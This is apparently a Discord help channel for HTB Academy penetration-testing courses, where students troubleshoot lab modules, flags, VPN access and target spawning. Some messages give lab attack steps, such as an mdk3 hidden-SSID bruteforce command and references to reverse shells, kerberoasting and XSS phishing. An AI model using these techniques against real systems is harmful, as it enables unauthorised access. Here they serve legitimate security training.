#modules

hii, I was wondering if i can practice different C2 frameworks in the "Intro to C2 Operations" module, like Havoc, or Cobalt Strike's cracked version (can't afford CRTO)

Hi, I want to reset my HTB Academy progress and start from scratch. Is that possible?

No, unfortunatly not @tepid lion

just make a new account ngl

Any staff member here who would know this...?

Hey! Working on Attacking Enterprise Networks module. I'm stuck on the "Web Enumeration & Exploitation" section, specifically SSRF & XXE. I can do the exploit and view the files, but I can't figure out how to list the contents of a folder, or even search for the flag. Seems I can only read files, not list folder contents.

guys for anyone who finished the skill test for the ffuf module what list did you use for the last question

One of the Xato ones

@signal stag this is the place to ask questions on modules, but please do not share information like flags etc as you did in your other post. You are looking in the wrong service. You already used the flag you shared in another answer as correct. Look somewhere else.

There is one with almost 900k line in it is the other shorter?

Can't recall. Only have hasty notes scribbled for that module. Only wrote done (xatosomethingoranother)

thanks

Has anyone found an easier way to copy the modules into obsidian since the update?

I'm spending a considerable amount of time fixing the markdowns. It's pretty frustrating.

I'm planning to buy a student plan for few months as to cover CPTS and COAI role path while Wondering if it's module would be accessible to me in this plan

No reason why you can't.

I'm not sure about the student plan. Are you sure it gives access to all the modules for CPTS?

To my knowledge it does - https://help.hackthebox.com/en/articles/13677074-academy-subscriptions#h_538e93266c

Yes it does, for CPTS, CWES, and COAI, one... I completed the CPTS path using the student sub

I am not sure but give 96 module access in the student plan

it gives access to all modules that are tier2 and below

anyone have the LLM Output Attacks Skill Assessment lab running incredibly slow? Trying to send a message to the imagebot and it takes 5+ minutes for one, this isnt feasible

Hi, I'm currently at the SQL Injections Fundamentals course and Subverting Query Logic sub-section. I just want to ask that I do get into the SQL injection but flag isn’t visible anywhere. Am I supposed to look elsewhere or is this an issue? I've attached an image for reference.

The same thing is happening with other challenges as well

You somehow logged in as admin and not tom. That's why you don't see a flag. Hit me up with your query and I could help

probably https://dev.mysql.com/doc/refman/8.4/en/operator-precedence.html

Ikr, I'm more concerned about using the cracked version of Cobalt Strike, I wanna try it once, but obv can't afford the legit one, it's like 3k, and don't wanna get banned at the same time 🥲

I definitely don't recommend getting and using a cracked/pirated version of Cobalt Strike. There are plenty of open-source alternatives. If you really want to try it and learn it, there are courses out there you can take, which provides access to the tool legally.

Alright, ig I'll just try other frameworks.... thanks tho 🙂

Hello, is anybody having issues with https://academy.hackthebox.com/app/module/267/section/3048 ? When I generate the new powershell and put in the pasword,I am unable to display the flag. It tells me it doesnt exist. Yet when I ping \LAB-DC there are no packets lost.

Hey everyone, I’m new to cybersecurity and currently learning Linux, Kali, and networking. I recently started setting up my lab and practicing beginner rooms/boxes. I’m really interested in ethical hacking and would love advice on how to improve and learn properly. Nice to meet you all.

Hello!
I am working on Understanding Log Sources & Investigating with Splunk and have a question about the Using splunk applications section. Do we have to make an account on splunkbase to download the sysmon app, or is the app file already on the system somewhere?

@shut wraith Please take care not to post content from modules above tier 0

Hi everyone, can any help to find the answer of this ques, windows privege escalation module, skill assessment part 1

Hello everyone, i'm currently doing Intro to Network Traffic Analysis and when RDPing into the target's IP my screen is completely black apart from some stuff at the top of it.
Can anyone help?

Hello everyone
I'm trying to read flag in skill assessment of file upload but in / directory I can see it but when I try to read it,the content is invisible

dm please

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Hello is it possible to contact a moderator/administrator of the platform. It seems that a link in one of the modules redirects to a malicious link and attempts to make you execute code on your computer.

admins/mods are just for discord, you need to reach out to support on the website for issues like that. you can DM me the page though and i can check and pass it on.

Ok I'm dming you the elements I have

Anyone able to help with the exercise within Linux Privilege Escalation - Environment Enumeration, been enumerating for a while now but can't seem to find the flag, tried basically all commands and places mentioned in the section.

I'm unable to make any progress on Footprinting->MSSQL. My nmap scan errors out, and am unable to connect to the MSSQL service using the creds and command provided. The connection times out on my virtual instance of Parrot

I've tried other versions of mssqlclient found in locate mssqlclient and run into the same error above

Still stuck if anyone is able to help me out ❤️

guys is there another browser in the shells and payloads live engagement beside Links2 ?

its only displaying text mode

Good evening, has anyone completed the ‘File Upload Attacks’ module?

many have

Is this a module you would recommend?

it's a great module, i'd recommend going down the job paths over a single module though

When you talk about career progression, are you referring to annual plans that culminate in certification?

Hey, I'm currently stuck on Attacking Wordpress question 4 in the Attacking Common Applications module. The question is "Following the steps in this section, obtain code execution on the host and submit the contents of the flag.txt file in the webroot.". I managed to get the user, brute-force the password and I have a web shell but I can't find the flag.txt. Can anyone help me?

The training required for those certs, yes, but it doesn't require you purchase a subscription, you can do the paths as a standalone. The subscription would be a lot cheaper overall though, especially if you can get the student plan.

lol, I'm new here. You've only just found out there are student discounts

I’ll find out what would suit me best

ty for informations

Hello. Can anyone help me answer the 3rd question in Finding Hidden SSIDs in Wi-Fi Penetration Testing Basics. So, the question is:
Identify the name of the hidden SSID with the BSSID d2:a3:32:1b:29:d5 and submit it as your answer.

So, I used the command the tutorial suggested, and typed sudo mdk3 wlan0mon p -b a -c 1 -t d2:a3:32:1b:29:d5. And my output was:
"
SSID Bruteforce Mode activated!

channel set to: 1
Waiting for beacon frame from target...
Sniffer thread started

SSID is hidden. SSID Length is: 8.

Got response from D8:D6:3D:EB:29:D5, SSID: "CyberNet-Secure"
Last try was: g'
"

And it's been like this for an hour. I don't get it, the length is good, but "CyberNet-Secure" doesn't match this length. Also. I wrote d2:a3:32:1b:29:d5 as an MAC adress, but it for some reason discovered D8:D6:3D:EB:29:D5. I already tried deauthenticating.

Needing to transfer a file from a win host back to pwnbox

win doesnt have python which i normally default to with http.server

thoughts?

scp

i saw that but i dont know the pwnbox credentials

desktop has credentials...

dude

ive been on this platform for so long and have never seen this

😭 😭

thank you

yeah lol

python also has uploadserver

https://pypi.org/project/uploadserver/

i was trying to get that to work but was having issues

ill check that out thank you

windows has invoke-webrequest (powershell) to be able to upload files https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.6

im sorry im having a hard time getting this working

the win host is powershell 5.1 which doesnt support the -Form parameter

i mean the alternative with xfreerdp is the /drive: option

trying to write report for AEN but i don't know if i should include all the vulnerabilities found since there are a lot of them or just the attack chain?

Anyone having problems with Detection & OpSec Cyber Range --> Detecting T1547.001 on Windows with the Detection & OpSec Cyber Range I cant seem to get it to say that the awsner is correct 🙂

When performing a pentest the company is paying for a full report of every issue you found, not just one attack path. Why wouldn't you provide all the issues you found instead of just some?

there is nothing i have not tried to get done with this but all to no avail, it is a question on frequency band on Network foundation .

Which frequency band is known for better wall penetration but more prone to interference?

if any one can help with the right answer, tried all i could

2.4ghz bro

doesn't work, done it with space, and no space same error

idk then @htb fix your platform

crazy it worked now

sorry @htb

already did

literally did send that earlier . Not the first time could be some kinda glitch, thanks btw

can anyone help me with a question in a module because whenever i enter the flag it says its incorrect

which module?

Network Enumeration with Nmap

DM me with specifics if you want

ok

What section is this in?

Capitalize GH in GHz

This is one of the few cases where the technicality of capital vs lower is important. G - Giga; g - not used in notation so as not to be somehow confused with grams. Hz - a unit of measurement (Hertz)

Thanks, it's just funny.
There's nothing I didn't do for it to work.

First submission as answer was 2.4 GHz .
It never worked,I tried several others then someone tried it again with same thing it worked, that's not the first time there's yet another case but after few trials it worked,then was immediately after I refreshed.

I would like to suggest an addition to Active Directory Enumeration & Attacks module, is there any way to do that? Confidential way, ideally.

/feedback

Another addition? At this point just split it up instead of adding more

Cant share but it should be a relatively small addition

Hi eveyone, I don't know if this is the good channel (if not I will move the message) but I got a question:
I am a Junior Fullstack Developer and would like to grow my cybersec/infosec knowledge on my freetime after work.
I am also a certified Blockchain developer and would like to find my way on the messy road of IT jobs.
My ultimate job would be a mix of Blockchain development and Cybersecurity/Infosec.

I like to set a tangible goal to challenge my self so I would like to follow a path that ends by passing a certification. As I am a developer, I consider having the foundamentals to understand easy to medium modules (might be wrong x).
I was first looking at the CPTS cert which I know is hard but I like to challenge myself.
The problem is that I wonder if another cert could be a better fit for my career.

What are your thoughts/advices ?
Thanks alot for your time 💚

Go for CWES ig, it would match your profile as fullstack developer, dont think there is blockchain in htb academy but I could be wrong

correct; there are no blockchain modules (yet) on HTB academy, they don't like making modules that they have little understanding or expertise on; there are blockchain challenges on the main platform however

Thanks for your responses, to clarify I am not searching for blockchain related certs/paths.
I just want to keep kind of a coherence between theses domains and to develop skills that will serve me in some way during my career.

What is CWES reputation in companies ? I know CPTS is recognized as a high-skilled cert by tech leads but not by HR

I dont know that for sure but it would be lower than CPTS. CWES is web application pentesting, 70% of it is covered in CPTS but it teaches graphql, api, Server side attacks and some auth attacks additionally.

While CPTS has 70% CWES so covers a significant portion of web, it also has network pentesting (privilege escalation, tunneling, common services) + AD pentesting, so it is a generic pentesting certificate while CWES is fully web focused.

Hi everyone! I'm working on the "Android Fundamentals" module, specifically the "Android Emulators" section and im stuck I'm trying to find the correct Build Number for the Pixel 3a API 34 Google APIs AVD. My emulator shows UE1A.230829.036.A4, but the validator says it's incorrect. I've already tried the base version UE1A.230829.036 and .A1 without success. Does anyone know if the validator is looking for a specific revision or a different format? Thanks!

Alright thank you so much

@faint hamlet and what about COAE ? Looks interesting to dig AI x Cyber future jobs. But seems hard, is it intended for already skilled pentesters ?

I dont know about it, seems niche to me

I'm doing linux fundementals, and am at System Management: Package management, the module says that I should download a github link. When using pwn, I tried downloading it, but i have some issues when trying to download...
┌─[root@htb-hdit0dupc7]─[/home/htb-ac-2257318] └──╼ #curl -I https://github.com/ ^C ┌─[✗]─[root@htb-hdit0dupc7]─[/home/htb-ac-2257318] └──╼ #curl -I https://github.com/ ^C ┌─[✗]─[root@htb-hdit0dupc7]─[/home/htb-ac-2257318] └──╼ #nc -vz github.com 443 DNS fwd/rev mismatch: github.com != lb-140-82-121-4-fra.github.com ^C ┌─[✗]─[root@htb-hdit0dupc7]─[/home/htb-ac-2257318] └──╼ #timeout 10 bash -c '</dev/tcp/github.com/443' && echo "443 open" || echo "443 blocked" ^C ┌─[✗]─[root@htb-hdit0dupc7]─[/home/htb-ac-2257318] └──╼ #curl -I https://google.com/ --max-time 15 ^C ┌─[✗]─[root@htb-hdit0dupc7]─[/home/htb-ac-2257318] └──╼ #curl -I https://github.com/ --max-time 15 curl: (28) Connection timed out after 15001 milliseconds ┌─[✗]─[root@htb-hdit0dupc7]─[/home/htb-ac-2257318] └──╼ #curl -4 -I https://github.com/ --max-time 15 curl: (28) Connection timed out after 15001 milliseconds
┌─[✗]─[root@htb-hdit0dupc7]─[/home/htb-ac-2257318] └──╼ #curl -4 -I https://github.com/ --max-time 15 curl: (28) Connection timed out after 15001 milliseconds ┌─[✗]─[root@htb-hdit0dupc7]─[/home/htb-ac-2257318] └──╼ #env | grep -i proxy ┌─[✗]─[root@htb-hdit0dupc7]─[/home/htb-ac-2257318] └──╼ #env | grep -i proxy ┌─[✗]─[root@htb-hdit0dupc7]─[/home/htb-ac-2257318] └──╼ #unset http_proxy https_proxy HTTP_PROXY HTTPS_PROXY all_proxy ALL_PROXY ┌─[root@htb-hdit0dupc7]─[/home/htb-ac-2257318] └──╼ #curl -I https://github.com/ --max-time 15 curl: (28) Connection timed out after 15001 milliseconds
I seem to be unable to create a connection, not just with google but also google etc...

I thought respawning a pwn might work, but forgot the daily limit...

pretty sure the pwnboxes don't have access to the internet...

Also, when trying the vpn way, I don't get admin access

E... so I should do it on my own system then?

yeah through the VPN

But on vpn I don't get any sudo premissions

huh? it's your own system... you should have sudo perms

I ment on the spawned target

O wait

I just realised what you ment

Ok, I'll try that

Thanks

I need more caffeine

Is it me or academy is super slow, and targets take for ever to spawn? cpts - linux privesc, well overall platform is super slow compared to labs

I just wanted to comment on this, mine is super slow too

yes

They might have issues with their servers recently

Small question in the linux fundemantals module remote desktop protocols section, if the X servers uses port 6000 for the first display then wouldn't its port ranges be 6000-6009?

I'm having the same issue, I had a terminal running a ping -c 1000 <vm-ip> to check if it's not responding... it is super slow.

i cant spawn targets

Can I DM anyone for NoSQL Injection Skill Assessment 2. I have read all messages from the forum and tried some variations with that. Its my second day on the challenge.

Has anyone finished the "Attacking Enterprise Networks" module? I'm stuck on the SSRF and XXE questions for the "Web Enumeration & Exploitation" module. I'm able to view the /etc/passwd file using both SSRF and XXE, but I'm having issues trying to enumerate the folders to find the flag. 🙁

aaaaaaaaa, finally found the injection endpoint. Just need to expand the query now.

And it was very simple, I don't know why i complicated things that much.

DM and i can try and help you out.

Thanks for the help! Can't believe it was that easy 😄 lol

@cloud urchin Hi, thanks for the info about the student discount (I signed up right away). I don't know if it's my fault, but I'd never come across this information before, so I'd probably still be buying the modules one by one right now. Maybe the student discount isn't promoted enough. Thanks again, and have a good evening.

Glad you got it, definitely much much cheaper with student discount, the value is insane

No, I should probably look into that.

Good evening, I'm stuck on the “File Upload Attacks” module in Section 5 (Blacklists) of the practical section. I'm being asked to bypass a blacklist. So I made a basic request intercepted by Burp, which I then sent to Intruder to test a list of PHP extensions (PayloadsAllTheThings) that could potentially bypass the blacklist. After getting the results, I tried to check the webshell but found no files. So I used another method: modifying the HTML code by uploading a file containing PHP. I get a message saying it went through fine, but no results. I’ve restarted several PwnBox instances and tried different targets, but nothing changes. I also tried accessing the file by manually testing all 22 extensions on the list, but still no results. I don’t really understand what the issue is. Any kind soul out there who can point me in the right direction?

so for web fuzzing module's directory and file fuzzing section, I am following along for the question and the section says to use common.txt wordlist at one point in the instructions but that wordlist only gives me one file. technically, another file is supposed to show up in the output as part of the example, but common.txt won't make it show up. I have gotten mixed results from different wordlists but none will show the hidden file. how do I get it to show me the hidden file? I know the file name but to me if I can't get ffuf to find it what's the point because I'm assuming I'm supposed to follow along. From there, I can go to the hidden file to get the flag I think.

I successfully found the folder I just can't find the other hidden file in the folder besides the index.

can someone point me in the right direction?

did you fuzz for directories, then for files?

You can dm if still stuck.

Hey, I'm in the Footprinting module right now and I'm in the SMTP section. The last question says that I should be using a wordlist to find the answer, but none are provided.....

There should be a resources button in the top-right next to the chapters

In the CPTS Footprinting Lab - Medium I cannot seem to resolve this below issue:

[17:55:07:435] [7800:7800] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.

I've ran

export DISPLAY=:0
export DISPLAY=ip-address:0.0

Googled the last hour. I'm completely lost and probably should power off the PC and go work at Home Depot at this point.

This usually happens when youre trying to rdp as root

I tried as root and user in the pwn box... nothing.

Try restarting the pwnbox then

I just connected to a completely different box.... same error.

Delete this as its a spoiler, but bear in mind protocols respond with a status code alongside a message 😉

Then reach out to support or try in your own vm

¯_(ツ)_/¯

Ok. Thank you for responding.

Also I recommend terminate -> start over just reset

But the error is client-side, not server-side.

Im also assuming youre using the in-browser vm, and not ssh in as ssh doesnt carry over a display variable by default

Yes in-browser.

yes

found the directory but only file I can find is index.html

the other file that's supposed to show up won't show up

since they tell me the page where the flag is in the instructions, I know I can get the flag but if I can't follow along because there's an issue or they aren't giving me the exact wordlist, then what's the point?

wanna get the full process right

I'm assuming its another wordlist besides common.txt

this is for the one question in Directory and File Fuzzing section of Web Fuzzing module

I already said that but I'm saying it again in case of confusion so everyone knows what I'm talking about

You can dm me if you're still stuck

will do thank you

Nvm

anyone done Premature Session Population (Auth Bypass) lab IN CWEE Path?

i have question, i have followed the exploitation steps, but it doesn't work. Am i missing some pieces?

i first attempted to login invalid, capture the session variable no followed redirection (here the session variable shouldn't be cleaned because i didn't follow redirection to /login.php?failed=1), craft a GET request to /profile.php with the captured session of admin user. still not working.

anyone has the answer?

i didit.

o/ Think I found a permissions bug that made a Medium Skills Assessment much easier than intended. Who/how do I reach out to confirm/fix?

Mentioned 2 years ago as well - https://discord.com/channels/473760315293696010/1261236325768495134

https://academy.hackthebox.com/app/module/116/section/1165 hi i am doing the module on ftp and i am unable to find the port that ftp service is running on. i tried a full nmap scan (-p-) and the none of the ports have ftp running on them. is there anything im missing?

DM if you want @burnt sundial

Are there multiple ways to solve the NoSQL injection skill assessment 2? As the hints mentioned by people on different forums are not aligning the way I solved.

There are often several ways to solve a problem. I don't know if that applies to this one

nvm, it worked after i restarted the box and waiting for a while

Im currently trying to do the Skills Assesments of the LLM Output Attacks. If someone could help me and point me in the right direction, I would appreciate that. I have been stuck here for almost a week. Feel free to DM me

Is it me or the HTB academy targets arent spawning?

Im doing the password attacks module now and it keeps loading without spawning the target

+1 but for windows priv esc citrix breakout section.

I am experiencing the same issue too!

I changed my VPN region and it spawned. Perhaps you can try it as well. Thanks!

Yeah seems to be working now, i didnt even change VPN region

Still need help?

Hello, i need help for AD Trust Attacks, GPO on site, can i pm someone ?

Yes please!

I do not know if this is the right place, but i have a question for shells & payloads "live engagement": apache tomcat runs on the first host ( 172.16.1.11 port:8080) and a hint mentions the exact credentials. Was there any way for me to figure these out myself?

I am currently doing the "Bypassing Security Filters" section of the "Web Attacks" module. I was able to get the flag.txt file, however, the flag in it is not acceppted/valid. It is not that kind of flag like "th1s_1s_f4k3_fl4g" or similar, as often misleads. Has anyone faced the same issue?

Hey gang! I'm working through the "Internal Information Gathering" section on the "Attacking Enterprise Networks" module. When trying to do ssh port forwarding, it just won't connect. I followed the steps outlined, unless I missed a small typo?

Intro to Network Traffic Analysis/Tcp Fundamentals can anyone explain why "Were absolute or relative sequence numbers used during the capture? (see question-1.zip to answer)" is ||relative||?

Since tcpdump is being used with -nnr, the output should default to absolute, right?

Also, seq 2387613953 etc is for the first two packets, but then it switches to relative

i dont get it

Does anybody know how to solve this problem when doing a kerberoasting attack using nxc? Error retrieving TGT for domain\user from 224.0.0.1 (proxychains). I have a pivot on dmz host.

i think you need to specify the domainname in /etc/krb5.conf

not sure

Hello, how can I get help ? I have around 4 days with Intermittent connection in the htb academy, in the module "Attacking Common Application" can't advance with this issue.

I tried to change vpn region, tried using the pwnbox, the same problem. I open the vm site, suddely it stopped responding... I have to wait around 5 minutes to work again or restart the vm... and it happens over and over

I am stuck on HTTP Response Splitting challenge, can someone help please ?

Hey guys I am doing WEP Attacks module and been stuck on Korek Chop Chop Attack section. Anyone available for help.

dm

Thanks but I got it

great

Hey guys, I'm doing the Skills Assessment - Password Attacks, and I've got access to DMZ01 (ext IP), and now trying to pivot to internal machines, however I believe I should be trying to proxychain my commands via my attackbox with nmap or ping test the other machines on the internal network, i can't establish a connection to them. Am I on the right path here?

Hey! i would like to ask about the skill assessment for the SQL Injection fundamental module

Should itry to do anything else from other modules?

or should i just focus on usingg everything in sql injection?

Does anyone have issues spawning targes? I'm doing "Attacking Enterprise Networks", at the Post-exploitation module, and the Spawn button doesn't do anything

ah, I see it's under maintenance. nevermind.

Hi for those who are doing Attacking Common Applications - Joomla - Discovery & Enumeration

If you are having trouble installing drooperscan, here is how I solve the missing 'imp' library

# install python3.11 
sudo add-apt-repostiory ppa:deadsnakes/ppa #python repo
sudo apt install python3.11

pipx install --python python3.11 droopescan

# Python 3.11 also deprecated distutils.utils
pipx inject droopescan setuptools

In Intro to Networking/ Networking Module, it is stated OSI is the new model and most widely used but ain't the OSI is the old model?

and tcp/IP is newer?

Pretty sure tcp/IP is just a simplified version of the OSI model

yep but the OSI model referred as newer model and most widely used was contradicting comparing to other networking lessons I had taken, that's why I asked.

also asked LLM which also said it's not true.

I've misread the question 🫡
You're right then I think

Hi - potentially silly question around the Pivoting, Tunneling and Port Forwarding module, section Remote/Reverse Port Forwarding with SSH

When downloading the msfvenom payload onto the Windows Target, and eventually executing the payload, should this be achieved via RDP using dynamic port forwarding?

TCP/IP is older

TCP/IP 70s, OSI 80s (though it was starting its conception in the 70s, it wasn't official until the 80s)

Restarting the target x3 times worked 😢

Good morning, friends! Sorry to bother you, but I need help. I'm working on the Cross-Site Scripting (XSS) module of the phishing page. I did everything correctly, but the bot accesses the login, but doesn't send me the credentials. Could someone give me a hint or guide me? Thank you all for your attention. This is the question: Try to find a working XSS payload for the image URL form found at '/phishing' on the server above, and then use what you learned in this section to prepare a malicious URL that injects a malicious login form. Then, access '/phishing/send.php' to send the URL to the victim, who will log in to the malicious form. If you did everything correctly, you should receive the victim's login credentials, which you can use to access '/phishing/login.php' and obtain the flag.

Hi, there's no way to revert to the old academy UI design right? I remember a button existing (?)

no, the button only existed while they were testing the new UI, the old UI has been retired

Linux Fundamentals module, Isn't this kind of inaccurate? I feel like ext4 is the file system most commonly used on linux distributions and Solaris does use ZFS as far as I know from my short googling, also SMF is not a file system I don't know why it says "On the other hand" as if its contrasting

I have having an issue with the sliver c2 Kerberos delegation module. it will not let me proxy chain using impacts psexec even after i used socks5 proxy so it can reach i set the proxy on the jump box so it can reach it sooo i am so confused lol please dm me if you got past that part and can help.

If you are comfortable with ligolo you could use that instead.

let me message you.

excuse me, can anyone confirm or deny?

Hey! i would like to ask about the skill assessment for the SQL Injection fundamental module
Should itry to do anything else from other modules?
or should i just focus on usingg everything in sql injection?

everything you need to do is explained in the sections, all the concepts are there

of course it will be a different scenario thats why you will have to use the concepts you learned to exploit the webapp

hey guys im stuck in the network foundations module on question 3 of section 5

What type of message does a client send to accept an IP address from a DHCP server?
its a DHCP Request no?

I keep getting the answer incorrect ive tried putting it all together, separate, all lower case upper case, you name it and I keep getting it wrong. what am I writing wrong?

try without DHCP, this module is finicky with how it expects you to word the answer

Any help ? (Tier 3 HTTP Attacks module)

DACL Attacks II - Logon Scripts - Question 1

Script is on the right folder, and the payload works (I can get a session by triggering it as Julio).

I've set the scriptPath attribute using bloodyAD, and the path of the script file is present when querying:

scriptPath: \\DC03\NETLOGON\WaynesScripts\exploit.bat```

Yet I can't get a shell as Wayne after waiting for ~10 minutes and two restarts. If you've solved it recently, please DM me.

any academy modules that will prepare me for reverse engineering challenges? Those <= Tier II

Anyone finished the Web Attacks module? I'm having trouble with the Bypassing Security Filters section and have a question.

Do I need to use pwn box in nmap module?

hey,

did anyone solved NTLM relay attack the section on authentiication coercion and can help me figuring out why is not working as supposed?

nope

HI

I stuck on that module, Network Enumeration with Nmap in his last section

Section name Firewall and IDS/IPS Evasion

Question (Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer).

yo guys, im on windows privesc, Further Credential Theft section. im really stuck at question 2,3,4, i want some hint

dm

Use detection evasion strategies, such as source port manipulation

DM if you are still stuck

DM if you need some pointers, recently did it

any help on loaded_shellcode? I can't seem to make it work, can t XOR it

and i m having issues with misaligned junk

Hi everyone! I'm starting my cybersecurity journey and I'm looking for guidance on where to begin.

I currently only know Python programming, and I want to learn cybersecurity from 0 to 100, building a strong foundation step by step.

My intention is to subscribe to the HTB Academy Student Plan, so I would really appreciate recommendations about the best paths/modules to start with as a complete beginner.

My long-term goal is to get into penetration testing, but I also want to properly learn networking, Linux, web security, and the fundamentals first.

Thanks!

first of all welcome
second
i would recommend starting with job role paths
here is what i think can help if u r an absolute zero
https://academy.hackthebox.com/app/paths/419/details

from that jump off to either SOC role path or Pentration tester path depends on what you like

Thank you so much!

I think starting with the fundamentals first makes the most sense before choosing between SOC or penetration testing.

Really appreciate the guidance!

guys i need help , this may seem dumb or silly : https://academy.hackthebox.com/app/module/268/section/3068

CWES : api attacks / Security Misconfiguration

Hi , im on password attacks module - Pass the Hash. I am not able to get reverse shell from DC01 to MS01.

Hello. Im relatively new to HTB academy. I have realized that there is no option to download a .opvn file for connecting into the HTB VPN anymore as it used to, for being able to solve the HTB excercises without using the pwnbox since I prefer using my own machine. If it still exists, I can not find the option absolutely anywhere. If someone could briefly clarify, I would be grateful. I hope this is the correct channel for asking for help

Same, been trying to find it for like 30 min now

Hi , to download the vpn file , you will find it in specific module excercises that need it

I am doing the file upload one right now, and under none of the modules there is an option to download one

If theres no option to connect to vpn , like this the excercise likely does not need u to connect to vpn

u can just spawn the target and start it

well I need to make a reverse shell, tried my public IP, but it didn't work. Just got a connection time out message

am I missing smth?

did u try pinging the target first

ping x.x.x.x without port

ye it's up, I can upload the file, but it never reaches my host

then u have messed something up , maybe in ur payload u didnt include port number of the local server you are hosting on/at

e.g x.x.x.x:8000

I did, tried multiple different ports as well

well idk which module u are doing so i cant help u rn , but if u can ping target its not a vpn issue

In other words, if there is no .opvn download trigger, the excercise is meant to be solved via the pwnbox, and there is no possibility to use your own machine. Right?

u can solve it on your machine...you just dont need vpn to access the target

Ok I will further investigate it, since I understand that for accessing HTB machines you are strictly required to be inside the VPN environment

anyone getting this error on : https://academy.hackthebox.com/app/module/268/section/3063

CWES : API ATTACKS / Broken Object Property Level Authorization

are you trying to solve a question? I don't recall the endpoint "certificates of incorporation"

yes whenever i upload a file it get that error , however the skilss assessment i can upload just fine

u have to upload remote-shell.exe

In the Linux fundamentals module, there is a question that asks me to type what is inside the hidden history folder in thm-student's home directory. Now I have done ls, ls -l and ls -la and there is no history file anywhere in the home directory, any help?

who's thm-student?

also dotfiles (files with a dot at the start are hidden and are generally relative to the user. so /home/htb-student would be where to start looking

think of /home/ as C:/Users

hi, i am running into an issue in the CPTS module, most of the windows labs that we have to attack, rn in the shells and payloads module, stuck in payloads and windows shells subsection, for some reason i cannot set up a meterpreter session even if the exploit is showing successful. i have put LHOST as the ip for tun0. LPORT i am using deafault, should i experiment with some other port ? i dont exactly gwt whats going wrong

do guide me as to what i should try next, i have tried manual shell deployment in the shells and payloads/payloads section of the module by using msfvenom and smb, and setting a netcat listner on the specified port and it still didnt work. i will try it once more tonight.

Hey guys is anyone facing the same problem in metasploit ?

try copy pasting the exploit path, maybe that might work.

use {exploit}

ive tried that as well and it still does not work ..

i even did msfupdate and other more i still dont get the issue

no clue, metasploit is acting up for me as well but not getting this issue.

How does this work then lmaooo

Hey, I'm at the metasploit tier 0 module, and I've been trying for the past 2 hours to find a good exploit to get into the machine and answer the questions, but I couldn't for the life of me find a good exploit, and I've been searching for vulnerabilities back and forth with no luck. I'll post the nmap scan as a reference. I'll appreciate the help

Type "reload_all" and wait for msfconsole to reboot, then try again

I am doing the lab footprinting easy. I need to enumerate a DNS server. So far so good. I am struggling with a small details (and in general the DNS enumeration is quick difficult i feel) that I didnt see. So, i enum the page and everything, got a lot of information out of it. Reached a certain point where i needed to check the solutions. Well, turns out, after the first nmap scan, there was an ftp server (which i connected to and it was empty). However, that ftp server was on ftp.internalt.inlanefreight.htb. I was enumerating all ".com" and it never crossed my mind, that I needed to start using the ".htb" ending. Why should I have known that I need to enum the .htb domain and not .com???

another interesting question is also: why do I need to do all the dns enumeration, if i do 1 nmap scan and I already got the correct ftp and can already login?

as it states earlier in the module, the point of enumeration is to understand the underlying infrastructure, not to attempt to force your way into the first weak spot. we want to find everything we can that looks even remotely interesting. also, i believe the exercise questions do in fact specify the .htb domain

is the difficulty of the "Attacking Common Services - Medium" medium because it is difficult to get an ip with the right service running? (how is the easy one easy and this one medium?)

Whoops! I cannot DM you after all due to your privacy settings. Please allow DMs from other server members and try again in 1 minute.

You're doing the skills assessment or just the DNS sub-module for the Footprinting module?

@terse osprey 👋🏽

https://cdn.discordapp.com/attachments/1179360318569316372/1261318963216781354/4x.gif

did someone encounter this error when doing the skill asessment for mssql,exchange and sccm attacks module..i am not able to get the emails

Hello guys
I'm trying to do skill assessment of command injection module however I got stuck at finding real injection point
Am I on the right direction?
I tried view and quickview sections so far for command injection but they haven't revealed anything yet
I know that maybe the payload isn't true as there are a lot of techniquess are covered in the whole module
Please just give the hint to me about the injection point,that's all

Can dm me if still stuck.

I just used PowerView. Instead of just htb-student try using the full email address.

Can anyone help me with the meterpreter section of the Metasploit tier 0 academy module?

Which section are you working on?

I'm at the meterpreter section, and I still couldn't find the right exploit to enter the machine

or section 11/15

Ok, tracking and have you tried what was shown in the section? Not sure if that is a follow along section, so I am asking because I truly don't know.

I did try using the same exploit as the section, but it didn't work. I also did try the exploit from cve-2017-7269 (as it is shown in the section), and it still failed. I then researched over again for multiple exploits (mainly for microsoft's iis 10, but also for smb) with no luck at all.

Did you start off with an nmap scan?

yes, most of the open ports were for Windows RPC, but the one that caught my eyes the most was Microsoft's IIS 10, since the version 6 of the same service was present in the example form the section

Did you identify any ports and services that aren't just Windows default ports and services?

Only the SMB service and and Ms Terminal services were at their default ports. The rest I believe were custom set ports

Did you by chance enumerate the services potentially being used by those custom ports?

I did, and all I got were ports 49664-49671 and port 135 (forgot to mention this one as being also default) belong to windows rpc, as for the Microsoft's httpapi htttpd 2.0, it's got ports 5985 and 47001

Alongside with IIS at port 5000

Hi guys

That's the only flag I could find on the PTRG dashboard using program execution through notification vulnerabiity

I would search the service associated with this port using your msfconsole session.

Well yeah, that's what I've been searching for all day, but exploit after exploit failed

Please refrain from posting flags from content. If a sanity check is necessary, I suggest asking for that instead. That flag did look like the correct one, so if it is not being accepted, check for leading and trailing space. Can also refresh the page and attempt to submit it again.

DM me how you are configuring it.

My bad, I wasn't so thoughtful posting that, I'll undo that message and DM you, I'd appreciate any suggestion for finding the flag

All good, I removed it. DM it to me and I'll double check what I have on my end.

Hello! In recent times, within certain modules, the flag etc. has been placed directly on the desktop or solely within the documents.
Consequently, almost no enumeration has been required. Is this truly correct?

yeah generally all they want is to make sure you did the steps to gain access to the user/admin. you don't need to go hunting down a file after you got full access, the goal is the access itself

Well it was like "rdp as the user bob" Find hes hidden credentials or something to recive password, and The flag was on desktop, immentlt after rdp :p. Still did all the steps but..

yoo wats up htb im a beginner n just finished my first module the one with nmap emuration i read thru all the theory n i did all the easy medium boxes but got stuck on the hard box. i did everything but i wasnt able to find what i needed i did the box thru vpn on my local vm but when i tried running it once on the vm on the parrotbox on the site the exact thing i was looking for did show up with the exact same command. idk if it was intentional or not... but it wasnt mention anywhere that the ids cared bout ingress/outgress traffic... so it was annoyingly frustrating that i couldnt complete it without turning on the machine on the site itself. was that intentional or was there a way i could do a nmap scan n find that specific port on my local vm?

for reference

Thank you for replying, appreciate the help 🙏

I figured it out after, turns out that I was just super baked and couldn't read the question properly, haha. I looked bavknover the next day and worked it out, really simple, .bash_history was the answer 🙈🙈🙈

